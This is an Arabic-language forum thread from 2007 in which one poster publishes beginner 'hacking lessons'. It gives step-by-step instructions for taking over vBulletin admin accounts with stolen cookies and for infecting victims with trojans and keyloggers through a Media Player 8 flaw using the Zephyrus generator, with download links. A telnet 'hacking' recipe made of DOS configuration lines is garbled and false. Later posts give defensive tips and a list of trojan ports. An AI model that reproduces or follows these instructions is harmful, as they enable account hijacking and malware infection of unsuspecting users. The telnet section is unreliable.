hakers x hakers دروس وبرامج ...(متجدد)

صفحة 2 من اصل 2 الصفحة السابقة  1, 2

استعرض الموضوع السابق استعرض الموضوع التالي اذهب الى الأسفل

رد: hakers x hakers دروس وبرامج ...(متجدد)

مُساهمة من طرف Eng.Maxpayen في الخميس سبتمبر 20, 2007 1:18 am

20]=1012444064;%20bblastvi sit=1011983161 فكر قليلا الان .. اين الباسورد ؟؟ الباسورد موجودة لكن بطريقة مشفرة يصعب كسرها .. اذن مالحل ؟ قم بنسخ الكود الذي وجدته والصقه في المتصفح .. بهذا الش http://www.victim.com/vb/index.php?bbuserid=[userid]&bbpassword=[password hash] ستجد عبارة : " أهلا بعودتك يـا ( اسم الذي سرقت منه الكوكيز....) " في هذه الحالة انت الان تستطيع التحكم بكل شي وكانك مدير المنتدى (الذي سرقت منه الكوكيز) .. لكننا نحتاج الى كلمة المرور للدخول الى لوحة التحكم .. اذهب الى (التحكم) وقم بتعديل البريد الالكتروني الى بريدك الخاص وثم قم بتسجيل الخروج .. ثم اذهب الى اداة Forgot Password .. وعندها تستطيع استقبال بريد يحتوي باسورد الادمن .. اعتقد انك تعلم ما يجب ان تفعله بعد ذلك !! ادخل الى لوحة التحكم وافعل ما تشاء .. ! ------------ الحل ----------- للحماية من هذه الثغرة قم باغلاق الـ HTML في (المنتدى + الرسائل الخاصة + التواقيع + التقويم + ... ) (واي منفذ يمكن من خلاله وضع كود HTML باي صورة كانت ) كما يجب اغلا كود الـ IMG .. لانه ببساطة بامكانك استخدامه بدل كلمة script فاذا وضعت img او Demon او اي كلمة اخرى فانه سيتم تنفيذ السكربت بشكل او باخر ... لذا كن حذرا واغلق هذه المنافذ . Be Secret .. Dont' be Lamer . تاريخ اكتشاف الثغرة : 31 - 1 - 2002 تم تجربتها على الاصدار 2.2.0 وهي تعمل بنجاح

web serves خادم الموقع
واذا كنت تبغى معاني كلمات ثانيه انا جاهز صرت مدرس لغه عربيه هاهاهاههاهاهاهاهاهاهاهاهاهاه
IP = وتعنى البرتكول المستخدم فى الانترنت

IP-No = رقم مقدم الخدمه

Server = الخادم

Client = ال**ون او العميل

Patch or Torjan = اسماء مستخدمه لملفات التجسس

Port = البورت او المنفذ
اختراق متقدم عن طريق MEDIA PALYER 8

تهل علينا كل صباح شركات انظمة التشغيل بالعديد من الثغرات فى منتجاتها وتعلن فورا عن ضرورة ترقيع نظام التشغيل حتى تحمي نفسك من اختراق المتطفلين لجهازك وسرقة خصوصياتك و ..

ولكن لم نتخيل ان يصل الامر الى برنامج ميديا بلاير الشهير .. حتى الرفاهية لم يتركهاالمخترقون الا وبحثوا من خلالها عن وسيلة للاقتحام
وبعد ان اعلن عن وجود ثغرة ببرنامج media palyer v8.00 تم ابتكار هذا البرنامج الذي يمكن من خلاله تكوين وصلة بموقعك وعند ارسال تلك الوصلة لشخص يتم تشغيل مقطوعة موسيقية من هيئة mp3 ولكن قبل التشغيل سيصيبك باتش وانت لاتدري، ..........
avatar
Eng.Maxpayen
مؤسس عالم الفن
مؤسس عالم الفن

عدد الرسائل : 1096
البلد : ISMAILIA
اللقب : Dark.King
تاريخ التسجيل : 09/09/2007

معاينة صفحة البيانات الشخصي للعضو http://Dark.King

الرجوع الى أعلى الصفحة اذهب الى الأسفل

رد: hakers x hakers دروس وبرامج ...(متجدد)

مُساهمة من طرف Eng.Maxpayen في الخميس سبتمبر 20, 2007 1:19 am

1- البرنامج إصدار شهر أكتوبر 2002م
2- الملف المضغوط للبرنامج يتكون من اربعة ملفات احدهما
generator - zephyrus_1.0.exe حجمه 319 ك وخلاف ذلك يكون مصاب بتروجان والثاني ملف ريد مي والثالث
ملف الربط الديناميكي ZipDll.dll والرابع Faq

3- يلاحظ ان هذا البرنامج وتلك الثغرة لن تصلح إذا كان جهاز الضحية لديه الإصدار
MediaPlayer V9.00

4- افتح الملف Generator لتقوم بالإعداد كالتالي:
• Load server

• تحميل أي باتش تريد اصابة الضحية به مثل الاوبتكس برو او الليثيوم او الموسوكر او موانج او كي لوجر
• اكتب وصلة لاي مقطوعة موسيقية حقيقية او اغنية سواء بموقع عام من الانترنت او موقعك الشخصي مث http://www.myserver.here/test.mp3 وهي التى سيستمتع بها الضحية اثناء الاصابة



• اختار اسم الفولدر بجهازك الذي سيتكون فيه ملفات الباتشات مثل c:\my document\my received files
• هذه الخطوة هامة جدا وتعتمد دقتها على انجاح الاصابة او لا وهي exec delay حيث تعتمد فكرة البرنامج على انه عندما يضغط الضحية على الوصلة لسماع الاغنية يبدا برنامج الميديا بلاير فى الاعداد للعمل كالمعتاد مثلما نراه يكتب buffering ولكن فى تلك الحالة يقوم بتحميل وتشغيل البتش فى جهازك وبعد الفترة التى تقوم بتحديدها مثل مافى الصورة 5 ثواني سيتوقف التحميل وتبدا المقطوعة سواء تم الانتهاء ونجاح التشغيل ام لا ... أي انه لابد من تحديد الوقت المناسب لتحميل الباتش طبقا للحجم المرسل والنصيحة هنا هو عدم زيادة الحجم عن 100ك والتى يقابلها تقريبا 10 ثواني او 5 ثواني والتى يقابلها 50 ك او بالطبع تختلف طبقا لسرعة الاتصال لدى جهاز الضحية ولذلك سيكون ذلك البرنامج ممتاز مع برامج الكي لوجرJanNet او باتش الليثيوم او k2ps ذات الحجم الصغير والاصابة البالغة والتحميل السريع حتى لايشك الضحية او تبدا الموسيى فى العزف قبل الانتهاء من المهمة



اذا كنت تريد ان يحصل الضحية على رسالة fake error window قم بالتاشير على تلك الخاصية وانا لاادعم ذلك حتى لاتثير الشكوك لانها خدعة معروفة
• اضغط generate
• تحصل على ملفين بجهازك فة المسار الذي حددته سابقا هما zephyrus.wmd and zephyrus.html
• قم بتحميل ذلك الملفين لموقعك الشخصي
• أرسل المسار الكامل لوصلة الأغنية للضحية واتركه يستمتع بألحان دمي ودموعي وابتسامتي مع رسالة البرنامج:
downloading the zephyrus.wmd, now the mp3 you selected will start to play

Coder Name : ISO
اسم صانع البرنامج ISO .
بالامكان الحصول على البرنامج من هنا

http://trojan.ch/zephyrus/zephyrus_1.0.zip

ولقد قام مبرمجه بأصدار نسخه متطور اخرى يمكن تحميلها من هنا

http://www.trojan.ch/zephyrus/zephyrus_1.1.zip


انصح بالتحديث الى الاصدار التاسع من الميديا بلاير او ترقيع ثغرة الاصدار الثامن او عدم سماع الموسيقى

تابع اخى..........
الدرسالأخير للمبتدئين الهاكرز

[الدرس الثاني من فنون الاختراق

الإختراق : أنواعة ودوافعة

تعريف الأختراق

الإختراق بشكل عام هو القدرة على الوصول لهدف معين بطريقة غير مشروعة عن طريق ثغرات في نظام الحماية الخاص بالهدف وبطبيعة الحال هي سمة سيئة يتسم بها المخترق لقدرته على دخول أجهزة الأخرين عنوه ودون رغبة منهم وحتى دون علم منهم بغض النظر عن الأضرار الجسيمة التي قد يحدثها سواء بأجهزتهم الشخصية او بنفسياتهم عند سحبة ملفات وصور تخصهم وحدهم . ما الفرق هنا بين المخترق للأجهزة الشخصية والمقتحم للبيوت المطمئنة الآمنه ؟؟ أرائيتم دناءة الأختراق وحقارته.

أسباب الإختراق ودوافعه

لم تنتشر هذه الظاهرة لمجرد العبث وإن كان العبث وقضاء وقت الفراغ من أبرز العوامل التي ساهمت في تطورها وبروزها الي عالم الوجود . وقد أجمل المؤلفين الثلاثة للمراجع التي استعنت بها في هذة الدروة الدوافع الرئيسية للأختراق في ثلاث نقاط اوجزها هنا على النحو التالي :

1- الدافع السياسي والعسكري: ممالاشك فيه أن التطور العلمي والتقني أديا الي الأعتماد بشكل شبة كامل على أنظمة الكمبيوتر في أغلب الاحتياجات التقنية والمعلوماتية. فمنذ الحرب البارردة والصراع المعلوماتي والتجسسي بين الدولتين العظميين على أشده. ومع بروز مناطق جديده للصراع في العالم وتغير الطبيعة المعلوماتيه للأنظمة والدول ، اصبح الأعتماد كليا على الحاسب الألي وعن طريقة اصبح الاختراق من اجل الحصول على معلومات سياسية وعسكرية واقتصادية مسالة أكثر أهمية.

2- الدافع التجاري: من المعروف أن الشركات التجارية الكبرى تعيش هي ايضا فيما بينها حربا مستعرة ( الكوكا كولا والبيبسي كولا على سبيل المثال) وقد بينت الدراسات الحديثة أن عددا من كبريات الشركات التجارية يجرى عليها أكثر من خمسين محاولة إختراق لشبكاتها كل يوم.

3- الدافع الفردي: بداءت اولى محاولات الأختراق الفردية بين طلاب الجامعات بالولايات المتحدة كنوع من التباهي بالنجاح في إختراق اجهزة شخصية لأصدقائهم ومعارفهم ومالبثت أن تحولت تلك الظاهرة الي تحدي فيما بينهم في اختراق الأنظمة بالشركات ثم بمواقع الأنترنت. ولايقتصر الدافع على الأفراد فقط بل توجد مجموعات ونقابات اشبة ماتكون بالأنديه وليست بذات أهداف تجارية. بعض الأفراد بشركات كبرى بالولايات المتحدة ممن كانوا يعملون مبرمجين ومحللي نظم تم تسريحهم من اعمالهم للفائض الزائد بالعمالة فصبوا جم غضبهم على انظمة شركاتهم السابقة مفتحمينها ومخربين لكل ماتقع ايديهم علية من معلومات حساسة بقصد الأنتقام . وفي المقابل هناك هاكرز محترفين تم القبض عليه بالولايات المتحدة وبعد التفاوض معهم تم تعيينهم بوكالة المخابرات الأمريكية الس أي اي وبمكتب التحقيقات الفيدرالي الأف بي أي وتركزت معظم مهماتهم في مطاردة الهاكرز وتحديد مواقعهم لأرشاد الشرطة اليهم .
avatar
Eng.Maxpayen
مؤسس عالم الفن
مؤسس عالم الفن

عدد الرسائل : 1096
البلد : ISMAILIA
اللقب : Dark.King
تاريخ التسجيل : 09/09/2007

معاينة صفحة البيانات الشخصي للعضو http://Dark.King

الرجوع الى أعلى الصفحة اذهب الى الأسفل

رد: hakers x hakers دروس وبرامج ...(متجدد)

مُساهمة من طرف Eng.Maxpayen في الخميس سبتمبر 20, 2007 1:19 am

أنواع الأختراق

يمكن تقسيم الإختراق من حيث الطريقة المستخدمة الي ثلاثة أقسام:

1- إختراق المزودات او الأجهزة الرئيسية للشركات والمؤسسات او الجهات الحكومية وذلك بأختراق الجدران النارية التي عادة توضع لحمايتها وغالبا مايتم ذلك باستخدام المحاكاة Spoofing وهو مصطلح يطلق على عملية إنتحال شخصية للدخول الي النظام حيث أن حزم الـ IP تحتوي على عناوين للمرسل والمرسل اليه وهذة العناوين ينظر اليها على أنها عناوين مقبولة وسارية المفعول من قبل البرامج وأجهزة الشبكة . ومن خلال طريقة تعرف بمسارات المصدر Source Routing فإن حزم الـ IP قد تم اعطائها شكلا تبدو معه وكأنها قادمة من كمبيوتر معين بينما هي في حقيقة الأمر ليست قادمة منه وعلى ذلك فإن النظام إذا وثق بهوية عنوان مصدر الحزمة فإنه يكون بذلك قد حوكي (خدع) وهذة الطريقة هي ذاتها التي نجح بها مخترقي الهوت ميل في الولوج الي معلومات النظام قبل شهرين.

2- إختراق الأجهزة الشخصية والعبث بما تحوية من معلومات وهي طريقة للأسف شائعة لسذاجة اصحاب الأجهزة الشخصية من جانب ولسهولة تعلم برامج الأختراقات وتعددها من جانب اخر.

3- التعرض للبيانات اثناء انتقالها والتعرف على شيفرتها إن كانت مشفرة وهذة الطريقة تستخدم في كشف ارقام بطاقات الأئتمان وكشف الأرقام السرية للبطاقات البنكيه ATM وفي هذا السياق نحذر هنا من امرين لايتم الأهتمام بهما بشكل جدي وهما عدم كشف ارقام بطاقات الأئتمان لمواقع التجارة الألكترونية إلا بعد التأكد بألتزام تلك المواقع بمبداء الأمان . أما الأمر الثاني فبقدر ماهو ذو أهمية أمنية عالية إلا أنه لايؤخذ مأخذ الجديه . فالبعض عندما يستخدم بطاقة السحب الألي من مكائن البنوك النقدية ATM لاينتظر خروج السند الصغير المرفق بعملية السحب او انه يلقي به في اقرب سلة للمهملات دون ان يكلف نفسه عناء تمزيقة جيدا . ولو نظرنا الي ذلك المستند سنجد ارقاما تتكون من عدة خانات طويله هي بالنسبة لنا ليست بذات أهمية ولكننا لو أدركنا بأن تلك الأرقام ماهي في حقيقة الأمر الا إنعكاس للشريط الممغنط الظاهر بالجهة الخلفية لبطاقة الـ ATM وهذا الشريط هو حلقة الوصل بيننا وبين رصيدنا بالبنك الذي من خلالة تتم عملية السحب النقدي لأدركنا اهمية التخلص من المستند الصغير بطريقة مضمونه ونقصد بالضمان هنا عدم تركها لهاكر محترف يمكنه استخراج رقم الحساب البنكي بل والتعرف على الأرقام السرية للبطاقة البنكية ATM .

اثار الأختراق:

1- تغيير الصفحة الرئيسية لموقع الويب كما حدث لموقع فلسطيني مختص بالقدس حيث غير بعض الشباب الإسرائيلي الصور الخاصة بالقدس الي صور تتعلق بالديانه اليهودية بعد عملية إختراق مخطط لها.

2- السطو بقصد الكسب المادي كتحويل حسابات البنوك او الحصول على خدمات مادية او اي معلومات ذات مكاسب مادية كأرقام بطاقات الأئتمان والأرقام السرية الخاصة ببطاقات الـ ATM

3- إقتناص كلمات السر التي يستخدمها الشخص للحصول على خدمات مختلفة كالدخول الي الانترنت حيث يلاحظ الضحية ان ساعاته تنتهي دون ان يستخدمها وكذلك انتحال شخصية في منتديات الحوار كما حدث للأخت الدانه بهذة الساحة. والأن وبعد هذة العجالة هل فكرتم بخطورة الاختراق ؟! هل خطر على احدكم بأن جهازة قد اخترق ؟؟ وكيف له أن يعرف ذلك قبل أن يبداء التخلص من ملفات التجسس ؟
طريقه للاختراق بدون باتشات ولا شي

هذه الطريقة تعتبر من اسهل الطرق لكنها غير مشهورا و هي طريقة telnet كل ما عليك هو اتباع الخطوات الاتية
1) افتح run و اكتب telnet
2) افتح connect
3) اكتب الايبي و البورت او اختار احد البورتات و غاليا ما يكون 80
4) اضغط عل connect و اصبر شوية
5) اول ما تلاقيه عمل connected اكتب الاوامر الاتية
device=c:/windows/himem.sys
device=c:/dos/emm386.exeram
buffers=40.0
flles=40
dos=umb
lastdrive=e
fcbs=16.8
devicec:/windows/setver.exe
dos=hhgh
stackes=9.256
device=c:/windows/ifshlp.sys
الان يا خوي انت داخل جهاز الضحية اعمل upload للباتش بأومر …dos
موضوع الرسالة: شرح كامل عن طرق التصدي من الهكرز
avatar
Eng.Maxpayen
مؤسس عالم الفن
مؤسس عالم الفن

عدد الرسائل : 1096
البلد : ISMAILIA
اللقب : Dark.King
تاريخ التسجيل : 09/09/2007

معاينة صفحة البيانات الشخصي للعضو http://Dark.King

الرجوع الى أعلى الصفحة اذهب الى الأسفل

رد: hakers x hakers دروس وبرامج ...(متجدد)

مُساهمة من طرف Eng.Maxpayen في الخميس سبتمبر 20, 2007 1:20 am

شرح كامل عن طرق التصدي من الهكرز

ماهي الاحتياطات التي يجب اتخاذها قبل الدخول الى الانترنت ؟؟؟
اعلم اخى واختى الافاضل ان عالم الانترنت كما هو مليء بالمعلومات

فهو ايضا ملى بالمشاكل كما هو الحال مع مخترقى الاجهزه فكلنا نعلم ما يحدث فى عالم الانترنت من اختراقات لخصوصيات الاخرين لذا وجب عليك اتخاذ الاحتياطات الامنيه التى تحقق لك الامان فى عالم ملى بالوحوش

اولا .. لا تحتفظ تحت اى ظرفا من الظروف باى صورا شخصيه مهما كلفك الامر انما قم بنقلها على فلوبى دسك وتاكد من مسحها حتى من سله المهملات ... واحذر خاصه اخواتنا مستخدمات الانترنت .. اما اذا كنت تظن ان سرقه الصور من جهازك مستحيله فانت على خطا .. بالعكس ان الصور تشكل اول الغنائم التى يبحث عنها مخترقى الاجهزه

ثانيا .. لا تحتفظ باى معلومات شخصيه فى داخل جهازك كرسائل او غيرها من معلومات بنكيه مثل ارقام الحسابات او البطائق الائتمانيه .. حتى اسمك الذى قمت بتسجيله عند تركيب الوندوز قم على الفور بتغييره .. وان كنت لا تعرف كيف .. اتجه الى صفحه المعلومات وخدع المواقع وسوف تتعرف على الطريقه وهى سهل جدا

كيف يتم اختراق جهازي؟؟

يتسال الكثير منا كيف يتم اختراق الاجهزه .. وهل يمكن اختراق اى جهاز .. وهل من السهوله اختراق الاجهزه .. ولكى نقم بشرح العمليه لكم يجب توضيح بعض المصطلحات المستخدمه وترجمتها من الانجليزيه الى العربيه

IP = وتعنى البرتكول المستخدم فى الانترنت

IP-No = رقم مقدم الخدمه

Server = الخادم

Client = ال**ون او العميل

Patch or Torjan = اسماء مستخدمه لملفات التجسس

Port = البورت او المنفذ

----------------------------------------------------------------------------------------------------

والان يجب ان تعرف انه لا يمكن ان يتم اتصال بجهازك الا فى حاله وجود ملف تجسس داخل جهازك والعمليه تتم كالاتى

عندما يصاب الجهاز بملف التجسس وهو التورجان او ما يسمى بالخادم فانه وعلى الفور يقوم بفتح بورت او منفذ داخل جهازك ولنفرض ان جهازك اصيب بملف التجسس الخاص ببرنامج النت باص وهو برنامج يستخدم للتجسس ويعتبر من اشهرها لان الباتش الخاص به او الخادم منتشر بشكل كبير فى الاجهزه ... حسننا والان اصيب جهازك بملف النت باص فسوف يتجه الملف الى الريجسترى ويقم بعمل او بفتح منفذ او بورت رقم 12345 ويستطيع كل من يملك البرنامج الخاص بالنت باص وهو العميل كما ذكرنا ... الكلينت .... ان يخترق جهازك لانه وجد بجهازك العامل المهم فى عمليه الاختراق وهو ملف التجسس



عندها يستطيع المتصل بجهازك ان يتحكم فى جهازك وبدون ان تشعر بذلك ... ماذا يستطيع ان يفعل بجهازك ... الاتــــــــــى

قفل الجهاز

سرقه الباص وورد الخاص بك

سحب اى ملف بجهازك

ارسال ملفات الى جهازك

مسح بعض الملفات من جهازك

6- فتح واغلاق السى دى روم او عاده تشغيل الوندوز.. وغيرها

كيف يعثر عليك المخترق؟؟

المصطلحات

Port Scan = الباحث عن البورتات او مساح البورتات
avatar
Eng.Maxpayen
مؤسس عالم الفن
مؤسس عالم الفن

عدد الرسائل : 1096
البلد : ISMAILIA
اللقب : Dark.King
تاريخ التسجيل : 09/09/2007

معاينة صفحة البيانات الشخصي للعضو http://Dark.King

الرجوع الى أعلى الصفحة اذهب الى الأسفل

رد: hakers x hakers دروس وبرامج ...(متجدد)

مُساهمة من طرف Eng.Maxpayen في الخميس سبتمبر 20, 2007 1:21 am

يخطى الكثير منا ويظن ان المخترق يعرف الجهاز المراد اختراقه بعينه .. وهذا خطا ولا يتم ذلك الا بوجود عاملا مهم كما سوف نذكره لاحقا .. اذا كيف يخترق جهازك او اى جهازا

فى الحقيقه ان معظم مخترقى الاجهزه يعتمدون على برامج تسمى بورت سكان او الباحث عن البورتات اى المنافذ ... يتم تشغيل البرنامج ...ثم يضع المخترق ارقام اى بى افتراضيه .. اى كما تقول لاى قم بالعد من واحد الى مئتين.. اى بمعنى اخر يضع كمثال الارقام الاتيه ... وهى ارقام اى بى

212.234.123.10

212.234.123.200

لاحظ الارقام التى فى الخانه الاخير والتى هى عشر = مئتين

اى يطلب البحث فى الاى بى التى تبدا من الرقم

212.234.123.10

الى الرقم مئتين

212.234.123.200

فى حاله وجود اى جهاز يحمل اى رقم اى بى بين الارقام الاخيره مصاب بملف تجسس فانه يقم بتسجيل رقم الاى بى ويرسله الى المخترق ...ويقم بكتابه فى الخانه الخاصه بارقام الاى بى كما هو موضح فى الرسم اعلاه

-------------------------------------------

لا يمكن ان يخترق جهاز شخص ما بعينه اى شخص بالتحديد الا بمعرفه رقم ..الاى.بى... الخاص بجهازه ..ورقم الاى بى المستخدم او الارقام المستخدمه تسمى دينامك نمبر اى انها متغيره وغير ثابته ... بمعنى اخر لنفرض انك اتصلت بالانترنت ووجدت ان رقم الاى بى الخاص بك هو

212.123.123.345

ثم خرجت من الانترنت او اقفلت الاتصال ثم عاودت الاتصال بعد خمس دقائق فان الرقم يتغير على النحو الاتى ..كمثال

212.123.123.201

-------------------------------------

اما عن الطريقه التى يمكن بها الدخول الى جهاز شخص معين فان ذلك يتم عندما تكن مستخدما لاحد البرامج التى تستخدم فى المحادثه ..مثل برنامج الاسكيو الشهير .. والذى يعتبر من اكبر مخاطره انه يمكنك الكشف عن ارقام ...الاى . بى ... لمستخدميه مهما حاولوا اخفاءه

كيف تصاب الاجهزه بملفات التجسس او الفايروس ؟؟

بسم الله الرحمن الرحيم

ان اكبر واسرع طرق لانتشار ملفات التجسس او الفايروسات باحد الطرق الثلاثه

اولا .. اما بارسالها مباشره الى جهازك عن طريق برامج المحادثه عندما يقم احدهم بارسال ملف اليك .. وقد خدع الكثير وللاسف واصيبت اجهزتهم بملفات تجسس او ملفات فايروسات مدمره عن طريق ارسال صورا اليهم ... فقد يجهل الكثير انه بالامكان وببساطه ادخال ملف تجسس او فايروس داخل صوره باستخدام برامج كثيره وبدون ان يشعر الشخص المستقبل للصوره بشى بل العكس سوف يرى الصوره وبشكل طبيعى ولاكنه يجهل ان الملف قد تم ارساله الى جهازه ... ويستطيع ايضا من لهم خبره فى البرمجه على الفيجول بيسك او السى بلس بلس او غيرها ان يصنع برنامج خاص به يساعده على اضافه اى ملف داخل صور او غيرها

-------------------------

ثانيا ... الارسال بواسطه الاميل فكثير منا ترده رسائل من مصادر لا يعرفها وبها ملفات مرفقه يقم بانزالها

-------------------------

ثالثا

بانزال برامج من مواقع مشبوه

-----------------------------------------------------------------

اذا ما هو الحل

الحل بسيط ومريح جدا

اولا ... لا تستقبل اى ملف من اى شخص عند استخدام برامج التشات ..الا من شخص تعرفه معرفه شخصيه

ثانيا .. عند وصول اى اميل من مصدر مجهول .. لاتخاطر بفتحه بل وعلى الفور قم بازالته فلن تخسر شيئا

ثالثا .. لا تقم بانزال اى برنامج من مواقع مجهوله الا ان كانت لديك برامج كاشفه عن الفايروسات وملفات التجسس ... كما اننى انصح بان لا تستخدم الانترنت الا بوجود برنامج مثل ... نورتن انتى فايروس الفين وان تعمل له اب ديت كل اسبوعين ..اى ... اى تجديد للمعلومات ... وهو برنامج لا غنى عنه لانه يتعرف على ملفات التجسس او الفايروسات ويمكنه من معالجتها فى جهازك بدون الاضرار بنظام التشغيل
avatar
Eng.Maxpayen
مؤسس عالم الفن
مؤسس عالم الفن

عدد الرسائل : 1096
البلد : ISMAILIA
اللقب : Dark.King
تاريخ التسجيل : 09/09/2007

معاينة صفحة البيانات الشخصي للعضو http://Dark.King

الرجوع الى أعلى الصفحة اذهب الى الأسفل

رد: hakers x hakers دروس وبرامج ...(متجدد)

مُساهمة من طرف Eng.Maxpayen في الخميس سبتمبر 20, 2007 1:22 am

طرق الكشف عن ملفات التجسس؟؟

بسم الله الرحمن الرحيم

توجد العديد من الطرق للكشف عن ملفات التجسس ولاكننى فى الحقيقه افضل استخدام برامج تقم بذلك مثل ما سبق ان ذكرنا برنامج ...نورتن انتى فايروس .... لانه بوجود اى خطا فقد تمسح ملف يحتاجه النظام او بالاصح نظام تشغيل الوندوز ... ولاكننى سوف اذكر الى اين تتجه ملفات التجسس فقط للمعرفه والتوضيح

---------------------------------------------

Registry

تعتبر منطقه الريجسترى هى المنطقه المهمه فى بدا تشغيل الوندوز .. اى ان البرامج التى تحتاج ان تعمل عند بدايه تشغيل الوندوز يجب ان تسجل فى هذه المنطقه .. لماذا ... لانه عند تشغيل الوندوز فان تلك المنطقه تشغل كل تلك البرامج الموجوده بها لتكون فعاله عن بدا الوندوز ...لذا توضع فيها ملفات التجسس لتحث الوندوز على تشغيلها وفتح المنافذ الخاصه ببرامج التجسس

ويمكنك الوصول الى تلك المنطقه بعمل الاتى

اولا ... اتجه الى ....ستارت... ابدا

START

ثم اطلب الامر ... تشغيل

RUN

سوف تظهر لك شاشه بيضاء .. اكتب الامر الاتى

regedit

ثم اضغط على اوكى

عندها سوف تظهر لك شاشه تسمى شاشه الريجسترى.... اختر منها الملف هاى كى لوكل مشين

HKEY_LOCAL_MACHINE

واضغط مرتين على الملفات الاتيه بالترتيب اى عند وصولك للملف اضغط مرتين عليه لكى

تصل للملف الذى يليه بالترتيب

HKEY_LOCAL_MACHINE

ثم

Software

ثم

Microsoft

ثم

Windows

ثم

CurrentVersion

ثم

Run او Run Once

عنمدا تصل الى ..رن .. او ... رن ونص ... انظر الى يمين الشاشه سوف تفتح لك ملفات التشغيل الخاصه بالبرامج ... هنا توجد ملفات التجسس ان وجد

الطريقه الاخرى

اتجه الى .. ستارت ... او ابدأ .... ثم اطلب الامر ...تشغيل

Run

عند ظهور الشاشه البيظاء اكتب الامر الاتى

msconfig

عندها سوف تظهر لك شاشه ... انظر الى اعلى الشاشه سوف تجد عده اوامر ..اختر منها الامر

Statup




كما ترى فى المربعات المؤشر عليها بالسهم اى تشغيل البرنامج عند بدا الوندوز ... وفى الخانه اليمين امتداد البرنامج او موقعه فى الوندوز



كيف تتأكد من الاتصال التام مع جهازك؟؟

كيف تتاكد من وجود اى اتصال تام مع جهازك

الامر سهل جدا .. كل ما عليك انه فى حاله التاكد من عدم اتصال اى جهاز اخر مع جهازك .. ان تتجه الى الدوس وتكتب الامر الاتى

C:Windows etstat -n

ولاحظ وجود مسافه بعد كلمه نت ستات ثم حرف الان ... ومعناها البحث عن الاتصال بالارقام

عندها سوف تظهر لك شاشه تاخذ ثوانى لاعطائك النتيجه وسوف تكون على النحو الاتى

Proto Local Address Foregin Address Stat

كل ما يهمنا فى الامر الفورن ادرس ووضعه

Foregin Address

والامر

Stat

وتعنى الاتى

Foregin Address = اى العنوان الاجنبى

State = اى الحاله او حاله الاتصال

سوف تجد فى الفورن ادرس ... ارقام مقدم الخدمه لك ..مع رقم البورت او المنفذ .. وهنا يجب ان تنتبه لان الحاله تكون كالاتى

ForeignAddress State

Established 212.123.234.200:8080
اى ان الارقام لمقدم الخدمه هى

212.123.234.200

ثم تاتى بعدها نقطتين فوق بعض ... ياتى بعدها رقم البورت وهو 8080

وهذا وضع طبيعى جدا ... ثم تاتى كلمه ... ستات ... اى الحاله وتحتها كلمه .. اشتبلش .. اى الاتصال تام .. وهذا ايضا طبيعى

----------------

المهم فى الامر ان وجدت رقم اى بى غريب ... وتتاكد من ذلك برقم المنفذ .. وهو الذى ياتى بعد النقطتين التى فوق بعض ... مثال

Foreign Adress State

212.100.97.50:12345 Established

انظر الى رقم .. الاى . بى ... ورقم المنفذ .. رقم الاى بى غريب .. ورقم المنفذ هو منفذ لبرنامج تجسس .. وحاله الاتصال تام مع جهازك.. اى انه بالفعل يوجد شخص الان فى داخل جهازك يتجسس عليك ... اكتب رقم المنفذ ... وهو ...البورت ... 12345 .... ثم اتجه الى قائمه البورتات الموجود فى الموقع تحت عنوان ارقام البورتات المستخدمه فى برامج التجسس وابحث عن اسم البرنامج لكى تعرف الملف المصاب به جهازك لتنظيفه


مع ملاحظه انه فى حاله انزالك لبرنامج او استخدام اى برامج تشات ..سوف تجد رقم الاى بى اما الخاص بالموقع الذى تقم بانزال البرنامج منه .. او رقم الاى بى الخاص بالشخص الذى تتحدث اليه .. وكما سبق ان قلنا فهذه احدى الطرق التى تستخدم لمعرفه رقم الاى . بى ... لاى جهاز يستخدم برامج التشات



اشهر برامج التجسس وارقام المنافذ المستخدمه؟؟؟

قائمه باشهر برامج التجسس .. مع ارقام المنافذ .. البورتات


21 TCP Blade Runner, Doly Trojan, Fore, FTP trojan, Invisible FTP, Larva, WebEx, WinCrash
23 TCP Tiny Telnet Server
25 TCP Antigen, Email Password المرسل, Haebu Coceda, Kuang2,
ProMail trojan, Shtrilitz, Stealth, Tapiras, Terminator, WinPC, WinSpy
31 TCP Agent 31, Hackers Paradise, Masters Paradise
41 TCP DeepThroat
53 TCP DNS
58 TCP DMSetup
79 TCP Firehotcker
80 TCP Executor
110 TCP ProMail trojan
121 TCP JammerKillah
129 TCP Password Generator Protocol
137 TCP Netbios name (DoS attacks)
138 TCP Netbios datagram (DoS attacks)
139 TCP Netbios session (DoS attacks)
421 TCP TCP Wrappers
456 TCP Hackers Paradise
531 TCP Rasmin
555 TCP Ini-Killer, Phase Zero, Stealth Spy
666 TCP Attack FTP, Satanz Backdoor
911 TCP Dark Shadow
999 TCP DeepThroat
1001 TCP Silencer, WebEx
1011 TCP Doly Trojan
1012 TCP Doly Trojan
1024 TCP NetSpy
1027 TCP ICQ
1029 TCP ICQ
1032 TCP ICQ
1045 TCP Rasmin
1080 TCP Used to detect Wingate sniffers.
1090 TCP Xtreme
1170 TCP Psyber Stream Server, Voice
1234 TCP Ultors Trojan
1243 TCP BackDoor-G, SubSeven
1245 TCP VooDoo Doll
1349 UDP BO DLL
1492 TCP FTP99CMP
1600 TCP Shivka-Burka
1807 TCP Spyالمرسل
1981 TCP Shockrave
1999 TCP BackDoor
2001 TCP Trojan Cow
2023 TCP Ripper
2115 TCP Bugs
2140 TCP Deep Throat, The Invasor
2565 TCP Striker
2583 TCP WinCrash
2801 TCP Phineas Phucker
2989 UDP Rat
3024 TCP WinCrash
3129 TCP Masters Paradise
3150 TCP Deep Throat, The Invasor
3700 TCP al of Doom
4092 TCP WinCrash
4567 TCP File Nail
4590 TCP ICQTrojan
5000 TCP Bubbel, Back Door Setup, Sockets de Troie
5001 TCP Back Door Setup, Sockets de Troie
5321 TCP Firehotcker
5400 TCP Blade Runner
5401 TCP Blade Runner
5402 TCP Blade Runner
5555 TCP ServeMe
5556 TCP BO Facil
5557 TCP BO Facil
5569 TCP Robo-Hack
5742 TCP WinCrash
6400 TCP The Thing
6670 TCP DeepThroat
6771 TCP DeepThroat
6776 TCP BackDoor-G, SubSeven
6939 TCP Indoctrination
6969 TCP GateCrasher, Priority
7000 TCP Remote Grab
7300 TCP NetMonitor
7301 TCP NetMonitor
7306 TCP NetMonitor
7307 TCP NetMonitor
7308 TCP NetMonitor
7789 TCP Back Door Setup, ICKiller
9872 TCP al of Doom
9873 TCP al of Doom
9874 TCP al of Doom
9875 TCP al of Doom
9989 TCP iNi-Killer
10067 TCP al of Doom
10167 TCP al of Doom
10520 TCP Acid Shivers
10607 TCP Coma
11000 TCP Senna Spy
11223 TCP Progenic trojan
12076 TCP GJamer
12223 TCP Hack´99 KeyLogger
12345 TCP GabanBus, NetBus, Pie Bill Gates, X-bill
